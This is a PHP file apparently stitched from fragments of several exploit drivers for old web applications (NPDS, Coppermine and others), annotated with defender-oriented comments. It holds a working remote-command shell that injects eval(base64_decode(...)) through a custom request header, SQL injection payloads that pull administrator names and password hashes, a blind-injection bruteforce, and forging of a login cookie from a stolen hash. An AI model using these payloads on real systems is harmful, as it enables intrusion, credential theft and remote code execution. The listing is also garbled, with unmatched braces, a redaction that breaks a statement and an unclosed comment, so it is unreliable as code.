/**
 * Interactive driver: reads commands from the operator, embeds each one in a
 * crafted request to the target's index.php, and prints whatever the target
 * echoes back between two random delimiters.
 *
 * Defender's reading of what is visible in this block:
 *  - every request carries a non-standard `MypCode` header whose value is
 *    base64; the `$_SERVER[HTTP_MYPCODE]` lookup in $php below is how the
 *    injected code consumes it. An unexpected request header of that name is
 *    a high-signal detection point.
 *  - the `fields` query parameter carries `eval(base64_decode(`, a classic
 *    webshell/RCE signature that a WAF rule or log search can match.
 *  - the injected string starts by closing a quoted value (`1');`), so the
 *    underlying weakness is unescaped interpolation of `fields` into a
 *    server-side sink. How that string reaches a PHP execution sink on the
 *    target is NOT shown on this page; do not infer it from here.
 *
 * phpsploit, head(), get_p(), cmd_prompt(), add_slashes() and to_char() are
 * defined elsewhere in the file.
 */
function main() {
    // HTTP client used for every request in this session.
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Banner / usage output (defined elsewhere).
    head();
    // Target base URL; the second argument presumably marks the option as
    // required — confirm against get_p().
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Closes the quoted value the target wraps `fields` in (the author's
    // "single quote bypass"); the exact server-side context is not visible here.
    $byp = "1');";
    // PHP code the target is meant to run: it evals the base64 body of the
    // MypCode request header. The command itself therefore never appears in
    // the URL — the header is the channel to watch in logs.
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Random per-run delimiter printed before and after the command output so
    // it can be cut out of the surrounding HTML. rand() is acceptable here: the
    // value only has to be unlikely to collide with page content, not secret.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code: delimiter, payload, delimiter, then exit() so the rest of
    // the page is not rendered; the trailing `//` is meant to comment out
    // whatever follows the injection point on the server side.
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Command loop; cmd_prompt() (defined elsewhere) returns false to stop.
    while (($cmd = cmd_prompt()) !== false) {
        // The command travels in a request header rather than in GET/POST,
        // which the author labels a magic_quotes_gpc bypass (magic quotes only
        // rewrote GET/POST/COOKIE data, never headers). add_slashes() is
        // presumably there to keep the system("...") literal well-formed when
        // $cmd contains quotes — defined elsewhere.
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // to_char() re-encodes $final for the URL (defined elsewhere; the
        // encoding it applies is not visible here). The `,1` suffix presumably
        // completes whatever list the server expects after `fields`.
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Split the response on the delimiter; $res[1] is the text between the
        // two print() calls, i.e. the command output.
        $res = explode($s_sep, $web->getcontent());
        // No delimiter in the response at all: the injected code did not run.
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            // Delimiters present but nothing between them.
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
// Fragment of an NPDS (<= 5.10) exploit driver: argument check and usage text,
// HTTP client setup, then the two SQL subqueries it injects through print.php.
//
// Defender's reading of the quoted target code further down: line 125
// integer-casts $lid, but the query on line 31 interpolates a DIFFERENT
// variable ($sid) into `lid='$sid'`, so the cast never protects the query.
// The application-side fix is a parameterised query (or, at minimum, casting
// the variable that is actually interpolated). In traffic the payloads below
// are recognisable by the CHAR(...) runs and the
// `%20SELECT%20...%20FROM%20authors%20WHERE%20radminsuper=1` subselect
// arriving in a single URL parameter.
//
// Notices (e.g. undefined index) are suppressed for the whole script.
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
// Usage banner; $argv['0'] is the script name (string key '0' coerces to 0).
if ($argc < 3) {
    print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
// getparam() is defined elsewhere; the second argument presumably marks the
// parameter as required — confirm against its definition.
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
// HTTP client (project class, defined elsewhere).
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125. settype ($lid, "integer");
# 126. PrintPage("links",$DB, $lid);
#
# 30. if ($oper=="links") {
# 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32. list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40. if ($DB) {
# 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
// Subselects that read aid / pwd of the author row(s) with radminsuper=1. The
// CHAR(...) lists decode to plain-ASCII begin/end markers (BEGINUSR/ENDUSR,
// BEGINPWD/ENDPWD) that bracket the extracted value in the rendered page so
// the client can locate it; they are equally usable as a response-side
// detection string. %20 stands in for spaces so the payload survives as one
// URL parameter.
$aid = 'CONCAT(CHAR(66,69,71,73,78,85,83,82),(SELECT%20aid%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,85,83,82))';
$pwd = 'CONCAT(CHAR(66,69,71,73,78,80,87,68),(SELECT%20pwd%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,80,87,68))';
// Fragment: the `}` below closes a block (presumably the usage/argument check)
// that starts before this excerpt.
}
// Option parsing. getparam() is defined elsewhere; the second argument
// presumably flags a required parameter — confirm against its definition.
$url = getparam("url", 1);
// Target table prefix, default 'nuke'.
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
// Work factor handed to the target's database; the name and the default of
// 1e8 suggest a BENCHMARK()-style timing primitive, i.e. a time-based blind
// extraction. The query itself is built in bruteforce(), outside this excerpt.
// If so, the server-side footprint is a burst of near-identical requests with
// consistently elevated response times.
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
// HTTP client (project class). allowredirection(0)/cookiejar(0) presumably
// disable redirect-following and cookie persistence — confirm in phpsploit.
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
// debug() is defined elsewhere.
if ($debug) {
    debug(1);
}
// NOTE(review): the "******" run in the next statement is not valid PHP; it
// looks like a redaction/extraction artifact in this listing, and what
// originally stood there cannot be recovered from this page.
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
// Presumably extracts $field piecewise from the injection point (the name and
// the $benchmark option suggest a blind technique); the body continues past
// the end of this excerpt. Note the heavy reliance on global mutable state
// ($a, $b, $c, $f, $result, ...) shared with the rest of the script.
function bruteforce($field) {
    global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
    $a = 0;
    $v = '';
    $dfield = $field;
// Fragment: `exit(1); }` closes a usage/argument check that starts before this
// excerpt.
exit(1);
}
// Option parsing (getparam() defined elsewhere; the second argument presumably
// marks a required parameter — confirm against its definition).
$url = getparam('url', 1);
$file = getparam('file', 1);
// Table prefix, default 'webs'.
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
// Match patterns used elsewhere to recognise the upload redirect and the
// profile page (single-quoted, so each `\\` is one literal backslash);
// overridable per target.
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
// HTTP client (project class, defined elsewhere).
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
// blind() (defined elsewhere) extracts a column value through the
// blind-SQL-injection point; the admin id and password hash are pulled here.
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
// Defender's note: the session cookie is assembled directly as "<id>%3A<hash>"
// and the script treats that as a logged-in state. If the target really
// accepts credential-derived cookies, a leaked hash is sufficient to log in
// without ever cracking it. The mitigation is an opaque, server-side session
// identifier (invalidated on password change) rather than a cookie built from
// stored credentials.
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
// Reviewer's reading of the excerpt: the only gate shown before the upload is
// the isfileadmin($userID) check; line 45 is omitted, so whether the file name
// or type is validated is not visible here. Authorisation alone does not make
// an upload endpoint safe — the usual controls are an extension allow-list,
// storage outside the web root, and never serving uploads through the script
// handler.
// Fragment of a Coppermine 1.4.10 SQL-injection driver: proxy setup, version
// fingerprint and users-table name derivation. $url is not assigned in this
// excerpt.
//
// Defender's notes on what is visible here:
//  - the version is read from a static file (include/index.html) that reveals
//    the exact release; shipping version strings in publicly reachable files
//    is what makes the fingerprint, and the table-name guess that follows,
//    trivial. Stripping them from the deployment removes that signal, and a
//    request for include/index.html followed by requests to the injection
//    point from the same client is a usable detection pattern.
//  - the User-Agent literal "InternetExploiter" set below is a ready-made log
//    signature for this tool.
//
// $argv[4]/$argv[5] are read without an isset() guard; a missing argument
// yields an undefined-index notice and an empty value.
$pxs = $argv[4];
$pxa = $argv[5];
// HTTP client (project class, defined elsewhere). cookiejar(1) and
// allowredirection(1) presumably keep cookies and follow redirects — confirm
// in phpsploit.
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/ Table prefix. /*/
// Fingerprint: the "Coppermine version: x.y.z" string in include/index.html
// selects the users table name; falls back to cpg1410_users otherwise.
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    print "\nsploit> Not found";
}
// e.g. "1.4.10" -> "cpg1410_users". $matches[1] is absent when the pattern did
// not match, hence the !empty() guard.
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
// The block comment below is left open at the end of this excerpt (no closing
// `*/` is visible); the file continues past this point.
/*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie');